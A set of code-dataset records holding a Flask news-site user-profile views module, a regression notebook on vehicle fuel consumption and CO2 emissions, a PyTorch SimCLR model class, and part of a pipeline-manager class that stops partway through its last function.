category_id\n news.digest = digest\n news.content = content\n news.index_image_url = constants.QINIU_DOMIN_PREFIX +key\n news.source = source\n news.user_id = user.id\n # 默认:审核中\n news.status = 1\n\n # 3.3 保存到数据库\n # 3. 
将评论模型对象保存到数据库\n try:\n db.session.add(news)\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存新闻对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='发布成功')\n\n\n@profile_bp.route('/pass_info', methods=['GET', 'POST'])\n@user_login_data\ndef pass_info():\n \"\"\"修改密码接口\"\"\"\n if request.method == 'GET':\n return render_template(\"profile/user_pass_info.html\")\n\n \"\"\"\n 如果是post请求,则是 修改密码\n 1.获取参数\n 1.1 old_password:旧密码 new_password:新密码 用户对象\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 如果old_password不正确 终止修改\n 3.2 如果old_password正确 则修改并保存\n 4.返回值\n \"\"\"\n # 1.1 old_password:旧密码 new_password:新密码 用户对象\n # 1.1 获取参数\n param_dict = request.json\n\n old_password = param_dict.get(\"old_password\")\n new_password = param_dict.get(\"new_password\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([new_password,old_password]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n # 3.1 如果old_password不正确 终止修改\n # if old_password != user.password: -------------> 因为保存的是hash值,所以不能这么比较\n if not user.check_passowrd(old_password):\n return jsonify(errno=RET.PWDERR, errmsg='密码错误')\n\n # 如果old_password正确 则修改并保存\n user.password = new_password\n\n # 3. 将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='密码修改成功')\n\n\n@profile_bp.route('/pic_info', methods=['GET', 'POST'])\n@user_login_data\ndef pic_info():\n \"\"\"展示用户头像页面 修改用户图片接口\"\"\"\n user = g.user\n if request.method == \"GET\":\n data={\n \"user_info\":user.to_dict()\n }\n return render_template(\"profile/user_pic_info.html\",data = data)\n\n \"\"\"\n 如果是post请求,则是修改头像\n 1.获取参数\n 1.1 avatar 头像\n 2.检验参数\n 3.逻辑处理\n 3.1 上传至七牛云\n 3.2 保存头像链接\n 4.返回值\n \"\"\"\n # 1.1 avatar 头像\n try:\n avatar_file = request.files.get(\"avatar\").read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '获取上传的头像出现异常'})\n\n # 3.1 上传至七牛云\n try:\n key = pic_storage(avatar_file)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.THIRDERR, \"errmsg\": '上传图片出现错误'})\n\n # 3.2 保存头像链接---不保存域名到数据库,方便以后更改域名,而不需要修改数据库\n user.avatar_url = key\n\n # 3. 
将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存头像对象异常\")\n\n return jsonify(errno=RET.OK, errmsg='图像上传成功',data={\"avatar_url\":constants.QINIU_DOMIN_PREFIX+key})\n\n\n#127.0.0.1:5000/user/base_info\n@profile_bp.route('/base_info',methods = [\"post\",\"get\"])\n@user_login_data\ndef user_base_info():\n \"\"\"展示用户基本资料页面\"\"\"\n # 获取用户对象\n user = g.user\n\n if request.method == \"GET\":\n # 组织返回数据\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n\n return render_template(\"profile/user_base_info.html\",data=data)\n\n\n \"\"\"\n 如果是POST请求,即为修改资料\n 1.获取参数\n 1.1 nick_name 昵称 signature 签名 gender 性别\n 2.检验参数\n 2.1 非空判断\n 3.逻辑处理\n 3.1 修改数据库中user的信息,并保存\n 3.2 修改session的nick_name\n 4.返回值\n \"\"\"\n # 1.1 获取参数\n param_dict = request.json\n\n nick_name = param_dict.get(\"nick_name\")\n signature = param_dict.get(\"signature\")\n gender = param_dict.get(\"gender\")\n\n # 1.2 获取当前用户\n user = g.user\n\n # 2.1 非空判断\n if not all([gender,signature,nick_name]):\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '参数不足'})\n\n # 判断用户是否登录\n if not user:\n return jsonify(errno=RET.SESSIONERR, errmsg=\"用户未登录\")\n\n # 3.1 修改数据库中user的信息, 并保存\n user.nick_name = nick_name\n user.signature = signature\n user.gender= gender\n\n # 3.1 将评论模型对象保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论对象异常\")\n\n # 3.2 修改session的nick_name\n session[\"nick_name\"] = nick_name\n\n # 4.返回值\n return jsonify(errno=RET.OK, errmsg='资料修改成功')\n\n\n#127.0.0.1:5000/user/info\n@profile_bp.route('/info')\n@user_login_data\ndef get_user_info():\n \"\"\"展示用户个人中心数据\"\"\"\n # 获取用户对象\n user = g.user\n # 组织返回数据\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n return render_template(\"profile/user.html\", data=data)\n\n\n@profile_bp.route('/collection', methods=['GET', 'POST'])\n@user_login_data\ndef user_collection():\n \"\"\"展示用户收藏的列表接口\"\"\"\n # 获取页数\n p = request.args.get(\"p\",1)\n\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.PARAMERR, \"errmsg\": '传入页面的参数错误'})\n\n user = g.user\n\n # 进行分页查询\n try:\n paginate = user.collection_news.paginate(p,constants.USER_COLLECTION_MAX_NEWS,False)\n # 获取分页数据\n collections = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n return jsonify({\"errno\":RET.DBERR, \"errmsg\": '数据库新闻收藏查询错误'})\n\n # 收藏列表\n collection_dict_list = []\n for news in collections:\n collection_dict_list.append(news.to_basic_dict())\n\n data = {\n \"total_page\": total_page,\n \"current_page\": current_page,\n \"collections\": collection_dict_list\n }\n\n return render_template(\"profile/user_collection.html\",data = data)\n\n\n@profile_bp.route('/news_list')\n@user_login_data\ndef news_list():\n # 获取页数\n p = request.args.get(\"p\", 1)\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n p = 1\n\n user = g.user\n news_li = []\n current_page = 1\n total_page = 1\n try:\n paginate = News.query.filter(News.user_id == user.id).paginate(p, constants.USER_COLLECTION_MAX_NEWS, False)\n # 获取当前页数据\n news_li = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n news_dict_li = []\n\n for news_item in news_li:\n 
news_dict_li.append(news_item.to_review_dict())\n\n data = {\"news_list\": news_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template('profile/user_news_list.html', data=data)","sub_path":"info/moduls/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"216080959","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[49]:\n\n\nimport numpy as np\nimport pandas as pd\nimport pylab as pl\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[50]:\n\n\ndf=pd.read_csv('F://FuelConsumptionCo2.csv')\ndf.head()\n\n\n# In[51]:\n\n\ndf.drop(['MODELYEAR','MAKE','MODEL','VEHICLECLASS','TRANSMISSION','FUELTYPE'],inplace=True,axis=1)\ndf.head()\n\n\n# In[52]:\n\n\ndf.drop(['FUELCONSUMPTION_COMB_MPG','CYLINDERS'],axis=1,inplace=True)\ndf.head()\n\n\n# In[53]:\n\n\nX=df.drop('CO2EMISSIONS',axis=1)\nY=df['CO2EMISSIONS']\nprint(X)\nprint(Y)\n\n\n# In[54]:\n\n\nplt.figure(figsize=(30,20))\nplt.plot(X,Y,'bo')\nplt.show()\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN \n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_CITY\n\n# In[55]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X['FUELCONSUMPTION_CITY'],Y,'bo')\nplt.show()\n\n\n# In[56]:\n\n\nX_city=df['FUELCONSUMPTION_CITY'].values\n\n\n# In[57]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# ## TRAIN OUR ALGO\n\n# In[58]:\n\n\nX_traincity,X_testcity,Y_traincity,Y_testcity=train_test_split(X_city,Y,test_size=0.2, random_state=4)\nX_traincity=X_traincity.reshape(len(X_traincity),1)\nlog=LinearRegression()\nlog=log.fit(X_traincity,Y_traincity)\nY_pred_traincity=log.predict(X_traincity)\nrmse=np.sqrt(mean_squared_error(Y_traincity,Y_pred_traincity))\nprint(rmse)\nprint(log.score(X_traincity,Y_traincity))\n\n\n# In[59]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X_traincity,Y_traincity,'bo')\nplt.plot(X_traincity,Y_pred_traincity,'r')\nplt.legend()\nplt.show()\n\n\n# ## TESTING OUR ALGO\n\n# In[60]:\n\n\nX_testcity=X_testcity.reshape(len(X_testcity),1)\nY_testpred=log.predict(X_testcity)\nprint(np.sqrt(mean_squared_error(Y_testcity,Y_testpred)))\nplt.figure(figsize=(20,10))\nplt.plot(X_testcity,Y_testcity,'bo',label='points')\nplt.plot(X_testcity,Y_testpred,'r',label='regression line')\nplt.show()\n\n\n# ## EQUATION OF ABOVE REGRESSION LINE\n\n# In[61]:\n\n\nm=log.coef_\nc=log.intercept_\nprint(m,c)\nx_city=11.2\ny_city=m*x_city+c\nprint(y_city)\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN\n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_HWY\n# \n\n# In[62]:\n\n\nX1=df['FUELCONSUMPTION_HWY'].values\n\n\n# In[63]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# In[64]:\n\n\nX1_trainhwy,X1_testhwy,Y_trainhwy,Y_testhwy=train_test_split(X1,Y,test_size=0.2,random_state=4)\nX1_trainhwy=X1_trainhwy.reshape(len(X1_trainhwy),1)\nlog=LinearRegression()\n\n\n# In[65]:\n\n\nlog=log.fit(X1_trainhwy,Y_trainhwy)\nY_trainhwypred=log.predict(X1_trainhwy)\nprint(log.score(X1_trainhwy,Y_trainhwy))\n\n\n# In[66]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X1_trainhwy,Y_trainhwy,'bo')\nplt.plot(X1_trainhwy,Y_trainhwypred,'r')\nplt.legend()\nplt.show()\n\n\n# ### training error\n\n# 
In[67]:\n\n\nrmse=np.sqrt(mean_squared_error(Y_trainhwy,Y_trainhwypred))\nprint(rmse)\nprint(log.score(X1_trainhwy,Y_trainhwy))\n\n\n# In[68]:\n\n\nX1_testhwy=X1_testhwy.reshape(len(X1_testhwy),1)\nY_testhwypred=log.predict(X1_testhwy)\nplt.figure(figsize=(20,10))\nplt.plot(X1_testhwy,Y_testhwy,'bo')\nplt.plot(X1_testhwy,Y_testhwypred,'r')\nplt.legend()\nplt.show()\n\n\n# ### test error\n\n# In[69]:\n\n\nrmse=np.sqrt(mean_squared_error(Y_testhwy,Y_testhwypred))\nprint(rmse)\nprint(log.score(X1_testhwy,Y_testhwy))\n\n\n# In[70]:\n\n\nm1=log.coef_\nc1=log.intercept_\nx1=6.7\ny1=m1*x1+c1\nprint(y1)\n\n\n# # LINEAR REGRESSION USING SCIKIT LEARN \n# ## HERE INDEPENDENT VARIABLE IS FUELCONSUMPTION_Comb\n\n# In[71]:\n\n\nX2=df['FUELCONSUMPTION_COMB'].values\n\n\n# In[72]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\n\n# In[73]:\n\n\nX2_train_comb,X2_test_comb,Y_train_comb,Y_test_comb=train_test_split(X2,Y,test_size=0.2,random_state=4)\nX2_train_comb=X2_train_comb.reshape(len(X2_train_comb),1)\nlog=LinearRegression()\nlog=log.fit(X2_train_comb,Y_train_comb)\nY_train_combpred=log.predict(X2_train_comb)\nprint(log.score(X2_train_comb,Y_train_comb))\n\n\n# In[74]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X2_train_comb,Y_train_comb,'bo')\nplt.plot(X2_train_comb,Y_train_combpred,'r')\nplt.legend()\nplt.show()\n\n\n# In[75]:\n\n\nX2_test_comb=X2_test_comb.reshape(len(X2_test_comb),1)\nY_test_comb_pred=log.predict(X2_test_comb)\nprint(log.score(X2_test_comb,Y_test_comb))\n\n\n# In[76]:\n\n\nplt.figure(figsize=(20,10))\nplt.plot(X2_test_comb,Y_test_comb,'bo')\nplt.plot(X2_test_comb,Y_test_comb_pred,'r')\nplt.legend()\nplt.show()\n\n\n# In[77]:\n\n\nm2=log.coef_\nc2=log.intercept_\nx2=8.5\ny2=m2*x2+c2\nprint(y2)\n\n\n# # POLYNOMIAL REGRESSION\n# \n\n# In[128]:\n\n\nX=df[['ENGINESIZE', 'FUELCONSUMPTION_CITY' ,'FUELCONSUMPTION_HWY','FUELCONSUMPTION_COMB']].values\nprint(X[:,3:])\n\n\n# In[133]:\n\n\n\n#X=X.reshape(len(X),1)\nlog=LinearRegression()\nlog=log.fit(X,Y)\nY_pred=log.predict(X)\nprint(np.sqrt(mean_squared_error(Y,Y_pred)))\nprint(log.score(X,Y))\n\n\n# In[134]:\n\n\nplt.figure(figsize=(20,10))\ny=log.intercept_+log.coef_[0]*X[:,:1]+log.coef_[1]*X[:,1:2]+log.coef_[2]*X[:,2:3]+log.coef_[3]*X[:,3:]\nplt.plot(X,Y,'bo')\nplt.plot(X,y,'r')\nplt.show()\n\n\n# In[135]:\n\n\nprint(log.coef_)\nprint(log.intercept_)\n\n\n# ## equation of polynomial regression\n\n# In[86]:\n\n\nm1=log.coef_[0]\nm2=log.coef_[1]\nm3=log.coef_[2]\nm4=log.coef_[3]\nc=log.intercept_\nx1=2\nx2=9.9\nx3=6.7\nx4=8.5\n\ny=m1*x1+m2*x2+m3*x3+m4*x4+c\nprint(y)\n\n\n# # POLYNOMIAL REGRESSION WITH ONLY ONE FEATURE\n# ## very important to understand\n\n# In[96]:\n\n\nX_engine=df['ENGINESIZE'].values\nX_engine=X_engine.reshape(len(X_engine),1)\n\n\n# In[97]:\n\n\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# In[98]:\n\n\npoly=PolynomialFeatures(degree=2)\nX_engine_poly=poly.fit_transform(X_engine)\nX_engine_poly\n\n\n# In[103]:\n\n\nlog=log.fit(X_engine_poly,Y)\nY_pred=log.predict(X_engine_poly)\n\n\n# In[104]:\n\n\nprint(log.score(X_engine_poly,Y))\n\n\n# In[105]:\n\n\nprint(log.coef_)\nprint(log.intercept_)\n\n\n# In[109]:\n\n\nxx=np.arange(0.0,10.0,0.1)\ny=log.coef_[1]*xx+log.coef_[2]*np.power(xx,2)+log.intercept_\nplt.figure(figsize=(20,10))\nplt.plot(X_engine,Y,'bo')\nplt.plot(xx,y,'r')\nplt.show()\n\n\n# In[110]:\n\n\nX_city=df['FUELCONSUMPTION_CITY'].values\nX_city=X_city.reshape(len(X_city),1)\n\n\n# 
In[111]:\n\n\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\n# In[112]:\n\n\npoly=PolynomialFeatures(degree=2)\nX_city_poly=poly.fit_transform(X_city)\nlog=log.fit(X_city_poly,Y)\nY_city_pred=log.predict(X_city_poly)\nprint(log.score(X_city_poly,Y))\n\n\n# In[114]:\n\n\nxx=np.arange(4.0,40.0,0.1)\ny=log.coef_[1]*xx+log.coef_[2]*np.power(xx,2)+log.intercept_\nplt.figure(figsize=(20,10))\nplt.plot(X_city,Y,'bo')\nplt.plot(xx,y,'r')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Fuelconsumption_CO2.py","file_name":"Fuelconsumption_CO2.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158223168","text":"import os\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\n\n####################################################\nout_channel = {'alexnet': 256, 'vgg16': 512, 'vgg19': 512, 'vgg16_bn': 512, 'vgg19_bn': 512,\n 'resnet18': 512, 'resnet34': 512, 'resnet50': 2048, 'resnext50_32x4d': 2048,\n 'resnext101_32x8d': 2048, 'mobilenet_v2': 1280, 'mobilenet_v3_small': 576,\n 'mobilenet_v3_large': 960 ,'mnasnet1_3': 1280, 'shufflenet_v2_x1_5': 1024,\n 'squeezenet1_1': 512, 'efficientnet-b0': 1280, 'efficientnet-l2': 5504,\n 'efficientnet-b1': 1280, 'efficientnet-b2': 1408, 'efficientnet-b3': 1536,\n 'efficientnet-b4': 1792, 'efficientnet-b5': 2048, 'efficientnet-b6': 2304,\n 'efficientnet-b7': 2560, 'efficientnet-b8': 2816}\n\nfeature_map = {'alexnet': -2, 'vgg16': -2, 'vgg19': -2, 'vgg16_bn': -2, 'vgg19_bn': -2,\n 'resnet18': -2, 'resnet34': -2, 'resnet50': -2, 'resnext50_32x4d': -2,\n 'resnext101_32x8d': -2, 'mobilenet_v2': 0, 'mobilenet_v3_large': -2,\n 'mobilenet_v3_small': -2, 'mnasnet1_3': 0, 'shufflenet_v2_x1_5': -1,\n 'squeezenet1_1': 0}\n\n####################################################\nclass SimCLRModel(nn.Module):\n\n def __init__(self, base_encoder, dim=128, pretrained=False):\n super(SimCLRModel, self).__init__()\n\n model = getattr(models, base_encoder)\n model = model(pretrained=pretrained)\n\n self.feature_extract = nn.Sequential(*list(model.children())[0]) if feature_map[base_encoder]==0 \\\n else nn.Sequential(*list(model.children())[:feature_map[base_encoder]])\n\n pool = nn.AdaptiveAvgPool2d(1)\n layers = [pool, nn.Flatten()]\n # projection MLP\n num_ftrs = out_channel[base_encoder]\n layers += [nn.Linear(num_ftrs, num_ftrs), nn.ReLU()]\n layers += [nn.Linear(num_ftrs, dim)]\n self.later_embedding = nn.Sequential(*layers)\n\n\n def forward(self, x):\n h = self.feature_extract(x)\n z = self.later_embedding(h)\n return h, z\n\n# modified from https://github.com/stanfordmlgroup/MoCo-CXR/blob/main/moco_pretraining/moco/moco/builder.py\n# class SimCLRModel(nn.Module):\n#\n# def __init__(self, base_encoder, dim=128, mlp=True, pretrained=False):\n# super(SimCLRModel, self).__init__()\n#\n# if pretrained:\n# model = getattr(models, base_encoder)\n# self.encoder = model(pretrained=True)\n# if self.encoder.__class__.__name__.lower() == 'resnet':\n# num_ftrs = self.encoder.fc.in_features\n# self.encoder.fc = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'vgg':\n# num_ftrs = self.encoder.classifier._modules['6'].in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'mnasnet':\n# num_ftrs = self.encoder.classifier[1].in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n# elif self.encoder.__class__.__name__.lower() == 'densenet':\n# num_ftrs = 
self.encoder.classifier.in_features\n# self.encoder.classifier = nn.Linear(num_ftrs, dim)\n#\n# else:\n# model = getattr(models, base_encoder)\n# self.encoder = model(num_classes=dim)\n#\n# if mlp:\n# if self.encoder.__class__.__name__.lower() == 'resnet':\n# dim_mlp = self.encoder.fc.weight.shape[1]\n# self.encoder.fc = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.fc)\n# elif self.encoder.__class__.__name__.lower() == 'vgg':\n# dim_mlp = self.encoder.classifier._modules['0'].weight.shape[1]\n# print(dim_mlp)\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n# elif self.encoder.__class__.__name__.lower() == 'mnasnet':\n# dim_mlp = self.encoder.classifier[1].weight.shape[1]\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n# elif self.encoder.__class__.__name__.lower() == 'densenet':\n# dim_mlp = self.encoder.classifier.weight.shape[1]\n# self.encoder.classifier = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.encoder.classifier)\n#\n# def forward(self, x):\n# return self.encoder(x)\n\nif __name__ == \"__main__\":\n model = SimCLRModel(\"vgg19\", 128)\n print(model)\n # model = getattr(models, \"vgg19\")\n # model = model(pretrained=False)\n # print(model)\n","sub_path":"models/simclr_model.py","file_name":"simclr_model.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"422673367","text":"import re\nimport importlib.util\nfrom pipert.core.component import BaseComponent\nfrom pipert.core.errors import QueueDoesNotExist\nfrom pipert.core.metrics_collector import NullCollector\nfrom pipert.core.routine import Routine\nfrom os import listdir\nfrom os.path import isfile, join\nfrom jsonschema import validate, ValidationError\nimport functools\n\n\n# import gc\n\ndef component_name_existence_error(need_to_be_exist):\n def decorator(func):\n @functools.wraps(func)\n def function_wrapper(self, *args, **kwargs):\n if not (self._does_component_exist(\n kwargs['component_name']) == need_to_be_exist):\n error_word = \"doesn't\" if need_to_be_exist else 'already'\n return self._create_response(\n False,\n f\"Component named {kwargs['component_name']} {error_word} exist\"\n )\n return func(self, *args, **kwargs)\n\n return function_wrapper\n\n return decorator\n\n\nclass PipelineManager:\n\n def __init__(self):\n \"\"\"\n Args:\n \"\"\"\n super().__init__()\n self.components = {}\n self.ROUTINES_FOLDER_PATH = \"pipert/contrib/routines\"\n self.COMPONENTS_FOLDER_PATH = \"pipert/contrib/components\"\n\n @component_name_existence_error(need_to_be_exist=False)\n def create_component(self, component_name, use_shared_memory=False, metrics_collector=NullCollector()):\n self.components[component_name] = \\\n BaseComponent(name=component_name, use_memory=use_shared_memory, metrics_collector=metrics_collector)\n return self._create_response(\n True,\n f\"Component {component_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=False)\n def create_premade_component(self, component_name,\n component_type_name,\n use_shared_memory=False,\n metrics_collector=NullCollector()):\n component_class = \\\n self._get_component_class_object_by_type_name(component_type_name)\n if component_class is None:\n return self._create_response(\n False,\n f\"The component type {component_type_name} doesn't exist\"\n )\n self.components[component_name] = \\\n 
component_class(name=component_name, use_memory=use_shared_memory, metrics_collector=metrics_collector)\n return self._create_response(\n True,\n f\"Component {component_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_component(self, component_name):\n if self._does_component_running(self.components[component_name]):\n self.components[component_name].stop_run()\n del self.components[component_name]\n return self._create_response(\n True,\n f\"Component {component_name} has been removed\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def add_routine_to_component(self, component_name,\n routine_type_name, **routine_parameters_kwargs):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n \"You can't add a routine while your component is running\"\n )\n\n routine_class_object = self._get_routine_class_object_by_type_name(routine_type_name)\n\n if routine_class_object is None:\n return self._create_response(\n False,\n f\"The routine type '{routine_type_name}' doesn't exist\"\n )\n\n if \"name\" not in routine_parameters_kwargs:\n return self._create_response(\n False,\n \"Routine must have a name\"\n )\n\n if self.components[component_name] \\\n .does_routine_name_exist(routine_parameters_kwargs[\"name\"]):\n return self._create_response(\n False,\n f\"Routine with the name {routine_parameters_kwargs['name']}\"\n \" already exist in this component\"\n )\n\n try:\n # replace all queue names with the queue objects of the component before creating routine\n for key, value in routine_parameters_kwargs.items():\n if 'queue' in key.lower():\n routine_parameters_kwargs[key] = self.components[component_name] \\\n .get_queue(queue_name=value)\n\n routine_parameters_kwargs[\"component_name\"] = component_name\n\n self.components[component_name] \\\n .register_routine(routine_class_object(**routine_parameters_kwargs)\n .as_thread())\n return self._create_response(\n True,\n f\"The routine {routine_parameters_kwargs['name']} has been added\"\n )\n except QueueDoesNotExist as e:\n return self._create_response(\n False,\n e.message()\n )\n except TypeError as error:\n return self._create_response(\n False,\n str(error)\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_routine_from_component(self, component_name, routine_name):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n \"You can't remove a routine while your component is running\"\n )\n if self.components[component_name].remove_routine(routine_name):\n return self._create_response(\n True,\n f\"Removed routine with the name {routine_name} from the component\"\n )\n else:\n return self._create_response(\n False,\n f\"There is no routine with the name {routine_name}\"\n f\" inside the component {component_name}\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def create_queue_to_component(self, component_name,\n queue_name, queue_size=1):\n if self.components[component_name].does_queue_exist(queue_name):\n return self._create_response(\n False,\n f\"Queue named {queue_name} already exist\"\n )\n\n self.components[component_name].create_queue(queue_name=queue_name,\n queue_size=queue_size)\n return self._create_response(\n True,\n f\"The Queue {queue_name} has been created\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def remove_queue_from_component(self, component_name, queue_name):\n if not 
self.components[component_name].does_queue_exist(queue_name):\n return self._create_response(\n False,\n f\"Queue named {queue_name} doesn't exist\"\n )\n\n if self.components[component_name]. \\\n does_routines_use_queue(queue_name):\n return self._create_response(\n False,\n \"Can't remove a queue that is being used by routines\"\n )\n\n self.components[component_name].delete_queue(queue_name=queue_name)\n return self._create_response(\n True,\n f\"The Queue {queue_name} has been removed\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def run_component(self, component_name):\n if self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n f\"The component {component_name} is already running\"\n )\n else:\n self.components[component_name].run()\n return self._create_response(\n True,\n f\"The component {component_name} is now running\"\n )\n\n @component_name_existence_error(need_to_be_exist=True)\n def stop_component(self, component_name):\n if not self._does_component_running(self.components[component_name]):\n return self._create_response(\n False,\n f\"The component {component_name} is not running\"\n )\n else:\n if self.components[component_name].stop_run() == 0:\n return self._create_response(\n True,\n f\"The component {component_name} has been stopped\"\n )\n else:\n return self._create_response(\n False,\n \"An error has occurred, can't \"\n f\"stop the component {component_name}\"\n )\n\n def run_all_components(self):\n for component in self.components.values():\n if not self._does_component_running(component):\n component.run()\n return self._create_response(\n True,\n \"All of the components are running\"\n )\n\n def stop_all_components(self):\n for component in self.components.values():\n if self._does_component_running(component):\n component.stop_run()\n return self._create_response(\n True,\n \"All of the components have been stopped\"\n )\n\n def get_all_routine_types(self):\n routine_file_names = [f for f in\n listdir(self.ROUTINES_FOLDER_PATH)\n if isfile(join(self.ROUTINES_FOLDER_PATH, f))]\n\n routine_file_names = [file_name[:-3] for\n file_name in routine_file_names]\n routine_file_names = \\\n [file_name[0].upper() + re.sub(r'_\\w',\n self._remove_string_with_underscore,\n file_name)[1:]\n for file_name in routine_file_names]\n\n routines = []\n for routine_name in routine_file_names:\n current_routine_type = \\\n self._get_routine_class_object_by_type_name(routine_name) \\\n .routine_type.value\n routines.append({\"name\": routine_name,\n \"type\": current_routine_type})\n return routines\n\n @component_name_existence_error(need_to_be_exist=True)\n def change_component_execution_mode(self, component_name, execution_mode):\n try:\n getattr(self.components[component_name], \"as_\" + execution_mode.lower())()\n return self._create_response(\n True,\n f\"The component {component_name} changed execution mode to {execution_mode}\"\n )\n except AttributeError:\n return self._create_response(\n False,\n f\"Cannot find execution mode '{execution_mode}'\"\n )\n\n # helper method for changing the file name to class name\n @staticmethod\n def _remove_string_with_underscore(match):\n return match.group(0).upper()[1]\n\n # helper method for changing the class name to file name\n @staticmethod\n def _add_underscore_before_uppercase(match):\n return '_' + match.group(0).lower()\n\n def get_routine_parameters(self, routine_type_name):\n routine_class_object = 
self._get_routine_class_object_by_type_name(routine_type_name)\n if routine_class_object is not None:\n return routine_class_object.get_constructor_parameters()\n else:\n return self._create_response(\n False,\n f\"Routine named {routine_type_name} doesn't exist\"\n )\n\n def setup_components(self, components):\n \"\"\"\n vvv Expecting to get vvv\n\n \"components\": {\n \"component_name\": {\n \"queues\": [str],\n \"routines\": {\n \"routine_name\": {\n \"routine_type_name\": str,\n ...(routine params)\n },\n ...(more routines)\n }\n }\n ...(more components)\n }\n \"\"\"\n component_validator = {\n \"type\": \"object\",\n \"properties\": {\n \"queues\": {\"type\": \"array\", \"items\": {\"type\": \"string\"}},\n \"routines\": {\"type\": \"object\"}\n },\n \"required\": [\"queues\", \"routines\"]\n }\n\n # Delete all of the current components\n self.components = {}\n responses = []\n # gc.collect()\n\n if (type(components) is not dict) and (\"components\" not in components):\n return self._create_response(\n False,\n \"All of the components must be inside a dictionary with the key 'components'\"\n )\n\n for component_name, component_parameters in components[\"components\"].items():\n try:\n validate(instance=component_parameters, schema=component_validator)\n to_use_shared_memory = component_parameters.get(\"shared_memory\", False)\n metrics_collector = component_parameters.get(\"metrics_collector\", NullCollector())\n if \"component_type_name\" in component_parameters:\n responses.append(self.create_premade_component(\n component_name=component_name,\n component_type_name=component_parameters[\"component_type_name\"],\n use_shared_memory=to_use_shared_memory,\n metrics_collector=metrics_collector))\n else:\n responses.append(self.create_component(component_name=component_name,\n use_shared_memory=to_use_shared_memory,\n metrics_collector=metrics_collector))\n if \"execution_mode\" in component_parameters:\n responses.append(self.change_component_execution_mode(\n component_name=component_name,\n execution_mode=component_parameters[\"execution_mode\"]))\n for queue in component_parameters[\"queues\"]:\n responses.append(self.create_queue_to_component(\n component_name=component_name,\n queue_name=queue))\n for routine_name, routine_parameters in component_parameters[\"routines\"].items():\n 